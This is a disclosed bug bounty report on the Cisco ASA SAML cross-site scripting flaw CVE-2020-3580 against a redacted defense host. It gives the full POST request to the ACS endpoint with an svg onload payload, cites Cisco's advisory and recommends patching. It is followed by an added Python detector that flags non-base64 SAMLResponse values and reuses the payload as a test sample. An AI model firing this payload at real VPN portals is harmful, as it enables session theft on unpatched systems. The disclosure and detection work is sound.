███████ - XSS - CVE-2020-3580

Disclosed: 2021-09-29 17:44:43 By pr3r00t To deptofdefense
Medium
Vulnerability Details
████ appears to be affected by the Cisco ASA XSS CVE-2020-3580. This vulnerability targets the SAML service within the VPN. It is triggered via a POST request to /+CSCOE+/saml/sp/acs?tgname=a

## References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe

## Impact

With this vulnerability, an attacker can, for example, steal users' cookies or redirect users to a malicious website.

## System Host(s)

██████████

## Affected Product(s) and Version(s)

Cisco ASA

## CVE Numbers

CVE-2020-3580

## Steps to Reproduce

Send a POST request from the browser:

```
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: █████
Connection: close
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 40

SAMLResponse="><svg/onload=alert('xss')>
```

## Suggested Mitigation/Remediation Actions

Patch Cisco ASA: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe
Report Stats
  • Report ID: 1243650
  • State: Closed
  • Substate: resolved
  • Upvotes: 6
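
A detection-side check for the request shown in the report, as an added example that is not part of the original report or of Cisco's advisory. It flags POSTs to the ACS path whose `SAMLResponse` field is not what the SAML HTTP-POST binding carries (base64-encoded XML). The function name `inspect_acs_post` is hypothetical and the sample requests are constructed.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlencode, urlsplit

ACS_PATH = "/+CSCOE+/saml/sp/acs"   # endpoint named in the report
MARKUP_CHARS = set("<>\"'")          # characters that never occur in base64 text


def inspect_acs_post(method, target, body):
    """Return findings for one request; an empty list means nothing suspicious."""
    if method.upper() != "POST" or urlsplit(target).path != ACS_PATH:
        return []
    values = parse_qs(body, keep_blank_values=True).get("SAMLResponse")
    if not values:
        return ["no SAMLResponse field in ACS POST"]
    findings = []
    for value in values:
        if MARKUP_CHARS & set(value):
            findings.append("SAMLResponse contains HTML metacharacters")
        try:
            # validate=True rejects any character outside the base64 alphabet
            decoded = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            findings.append("SAMLResponse is not valid base64")
            continue
        if not decoded.lstrip().startswith(b"<"):
            findings.append("decoded SAMLResponse is not XML")
    return findings


# Constructed sample requests: (method, request target, form body)
_benign_xml = b'<samlp:Response ID="_constructed"/>'
SAMPLES = {
    "report_payload": ("POST", ACS_PATH + "?tgname=a",
                       "SAMLResponse=\"><svg/onload=alert('xss')>"),
    "benign": ("POST", ACS_PATH + "?tgname=a",
               urlencode({"SAMLResponse": base64.b64encode(_benign_xml).decode()})),
    "other_path": ("POST", "/login", "user=a"),
}


def scan_samples():
    """Run the check over every constructed sample and return name -> findings."""
    return {name: inspect_acs_post(*req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(name, findings or "ok")
```

The same check can run in a reverse proxy or over captured request bodies; it complements patching and does not replace it.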